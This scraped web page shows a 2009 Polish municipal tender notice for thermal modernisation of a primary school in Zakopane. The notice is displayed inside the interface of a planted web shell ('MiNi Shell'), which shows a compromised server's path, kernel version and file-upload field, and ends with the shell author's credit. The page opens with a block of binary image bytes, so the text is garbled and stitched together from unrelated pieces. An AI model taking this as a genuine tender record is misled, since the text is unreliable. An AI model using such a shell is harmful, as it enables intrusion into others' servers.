JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/103991-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/38/09  termomodernizacja budynku Szkoły Podstawowej Nr 3 w Zakopanem</b><br>
<b>Numer ogłoszenia: 103991 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/38/09  termomodernizacja budynku Szkoły Podstawowej Nr 3 w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robot budowlanych w ramach zadania nr 11/07 Termomodernizacja budynku szkoły podstawowej nr 3 położonej w Zakopanem, wykonywanego w ramach projektu PLO 128Termomodernizacja budynków oświatowych Miasta Zakopane realizowanego przy wsparciu udzielonym przez Islandię, Liechtenstein i Norwegię poprzez dofinansowanie ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego.
Zakres zamówienia obejmuje:  
1	Przedmiotem zamówienia robót budowlanych będzie termomodernizacja budynku szkoły polegająca  w szczególności  na :
1.1.	rozbiórce starych przybudowanych garaży
1.2.	częściowej wymianie stolarki okiennej i drzwiowej 
1.3.	ociepleniu ścian zewnętrznych poniżej terenu metodą lekką mokrą łącznie 
z wykonaniem hydroizolacji
1.4.	ociepleniu ścian zewnętrznych  powyżej terenu metoda lekką mokrą łącznie 
z wykonaniem częściowej okładziny kamiennej lub równoważnej 
1.5.	 wykonaniu zabezpieczenia ścian przed graffiti
1.6.	ociepleniu ościeży okien i drzwi 
1.7.	ociepleniu partii  poddasza łącznie z wymiana  drewnianych wykończeniowych  elementów zewnętrznych,  
1.8.	remoncie  kominów i wentylacji wraz z jej wyprowadzeniem ponad połać dachową 
1.9.	wymianie  pokrycia dachowego z blachy trapezowej na blachę o tłoczeniu gontopodobnym 
1.10.	wymianie oraz  częściowej  przebudowie   elementów więźby dachowej obejmującej w szczególności partie koszowe, 
1.11.	wymianie drewnianych elementów wykończeniowych połaci dachowych 
1.12.	wykonaniu izolacji  połaci dachowych
1.13.	wymiana obróbek blacharskich 
1.14.	wymiana instalacji odgromowej 
1.15.	wykonanie robót porządkowych towarzyszących.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.45.00.00-6, 45.26.10.00-4, 45.44.21.10-1, 45.45.20.00-0, 45.32.00.00-6, 45.42.00.00-7, 45.42.20.00-1, 45.26.21.00-2, 45.32.00.00-6, 45.32.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  20.000,00 zł  ( słownie: dwadzieścia  tysięcy    złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj. 28 lipca 2009r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 28 lipca 2009r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 /parter/.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

4.	ZWROT WADIUM : 
1) Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy.
 c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
      2)  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
3)   Zamawiający żąda  ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ppkt 2 lit. b i c  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego 
4) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
      wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o  
      których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z 
      przyczyn nieleżących po jego stronie. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

3) znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych
Opis sposobu dokonywania oceny spełnienia warunków:
 Doświadczenie: 
-Wykonawca musi wykazać, że w ciągu ostatnich 5 lat kalendarzowych ( licząc od daty wszczęcia postępowania) a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej 3 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia tj. remont, przebudowę lub budowę obiektu o konstrukcji i technologii wykonania odpowiadającej przedmiotowi zamówienia w tym o technologii i konstrukcji   odpowiadającej termomodernizacji obiektu ,   o wartości nie mniejszej niż 500 000  zł, każda, 

Potencjał kadrowy
-Wykonawca musi zapewnić kierowanie zleconymi robotami przez osoby posiadające uprawnienia konstrukcyjno-budowlane bez ograniczeń lub odpowiadające wydane na podstawie wcześniejszych przepisów, uprawniające do kierowania robotami budowlanymi i  należące do  Izby  Inżynierów Budownictwa

Potencjał techniczny
-Wykonawca musi  w tym zakresie złożyć stosowne oświadczenia. 
 Potencjał finansowo- ekonomiczny 
-Wykonawca musi wykazać , że posiada środki finansowe lub zdolność kredytową 
w wysokości nie mniejszej niż  500 000,00 zł (słownie: pięćset  tysięcy złotych)  
 
Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1).aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2). aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
3).aktualną informację  z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu      składania ofert;
4).aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

5). oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art.24 ust.1 i 2 ustawy Pzp( załącznik nr 2 do  siwz) oraz oświadczenie wykonawcy, że spełnia warunki określone w art.22 ust.1 pkt.1-3  ustawy PZP (załącznik 2a do  siwz) 

6) na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć  do    oferty  wykaz ( należy wypełnić   załącznik nr 5    do   siwz)             wykonanych w   okresie ostatnich 5 lat przed dniem wszczęcia niniejszego            postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie)  który będzie potwierdzał, że wykonawca  wykonał  co najmniej  3 roboty o zakresie     podobnym swoim rodzajem i wartością robotą  stanowiącym przedmiot zamówienia tj. remont, przebudowę lub budowę obiektu o konstrukcji i technologii wykonania odpowiadającej przedmiotowi zamówienia w tym o technologii i konstrukcji   odpowiadającej termomodernizacji obiektu ,   o wartości nie mniejszej niż 500 000  zł, każda, 


 
      Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie   roboty    zostały wykonane należycie.

7).wypełniony druk oferty stanowiący załącznik nr 3 do  siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

8).informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy z tego okresu - należy wypełnić załącznik nr 8 do siwz

9). wykaz osób( należy wypełnić załącznik nr 9 do  siwz) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby, którymi będzie dysponował.
 Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać , że wykonawca dysponuje lub będzie dysponował  osobami  które posiadają uprawnienia 
konstrukcyjno-budowlane bez ograniczeń lub odpowiadające wydane na podstawie wcześniejszych przepisów, uprawniające do kierowania robotami budowlanymi i  należące do  Izby  Inżynierów Budownictwa

Wykonawca zobowiązany jest do powyższego wykazu załączyć kserokopie uprawnień  oraz kserokopie  aktualnej przynależności do właściwej Izby Inżynierów Budownictwa  


10). na  potwierdzenia  znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga  załączenia do oferty  informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków     finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 500.000,00-   zł ( słownie: pięćset   tysięcy   złotych ) wystawionej nie   wcześniej niż 3   miesiące przed upływem terminu składania ofert,


11). załączyć do oferty  kosztorys ofertowy sporządzony wg wszystkich pozycji załączonego  przedmiaru i wykazanych w nim podstaw. W cenach i wartościach jednostkowych tak sporządzonego kosztorysu ofertowego wykonawca jest zobowiązany uwzględnić wszystkie swoje koszty związane z realizacją zlecanych robót

 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w :
	1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pktXIII siwz
	1)	pkt 1, 2 i 4 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
	2)	pkt 3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.

2. Dokumenty, o których mowa w ust. 1 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio


UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt PLO 128Termomodernizacja budynków oświatowych Miasta Zakopane realizowanego przy wsparciu udzielonym przez Islandię, Liechtenstein i Norwegię poprzez dofinansowanie ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego.
Inne: 
Z uwagi na to ,że roboty  na obiekcie będą wykonywane w trakcie roku szkolnego Wykonawca zobowiązany jest do podjęcia  wszelkich środków zaradczych zapewniających bezpieczeństwo użytkowników  szkoły podczas wykonywania zlecenia . Roboty  uciążliwe, wyburzeniowe powinny być   w razie możliwości  wykonywane  po godzinach lekcyjnych.
Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego specjalistę. Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
-śmierci, choroby lub innych zdarzeń losowych kluczowego specjalisty,
-niewywiązywania się kluczowego specjalisty z obowiązków wynikających
z umowy,
-jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.).
2.Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
3.W przypadku zmiany kluczowego specjalisty, nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
4.Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie 
z żądaniem zamawiającego w terminie wskazanym we wniosku zamawiającego.
5.Wykonawca może w oparciu o umotywowany posemny wniosek, zaakceptowany przez zamawiającego ,przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ 
na wykonanie przedmiotu umowy, w wykonaniu następujących zobowiązań:
- przekazania terenu budowy,
- przekazania dokumentów budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych, innych wymaganych przepisami, do których zamawiający był zobowiązany),
- przekazania dokumentów zamiennych budowy lub usunięcia wad 
w dostarczonej dokumentacji,
- zapewnienia możliwości poboru wody i energii elektrycznej na potrzeby budowy,
- zmiany terminu dokonania prób końcowych i wniosku o dokonanie prób dodatkowych nie objętych umową,
- zmiany terminu dokonania odbiorów przewidzianych w umowie,
- jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez 
lub dających się przypisać zamawiającemu, lub innemu wykonawcy, zatrudnionemu przez zamawiającego na trenie budowy.
6.Wykonawca może na pisemny umotywowany wniosek , zatwierdzony przez zamawiającego , przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w przypadku:
-Zawieszenia robót przez zamawiającego,
- Szczególnie niesprzyjających warunków atmosferycznych
-Zmian dokumentacji projektowej, dokonanych na wniosek zamawiającego 
    lub wykonawcy,
- Siły wyższej.
7.Utrata prawa do przedłużenia terminu wykonania przedmiotu umowy. 
Wykonawca nie będzie uprawniony do żadnego przedłużenia umowy, jeżeli 
oraz w zakresie, w jakim uchybienie zamawiającego było spowodowane przez jakikolwiek błąd lub opóźnienie ze strony wykonawcy, włącznie z błędem

Creat By MiNi SheLL
Email: jattceo@gmail.com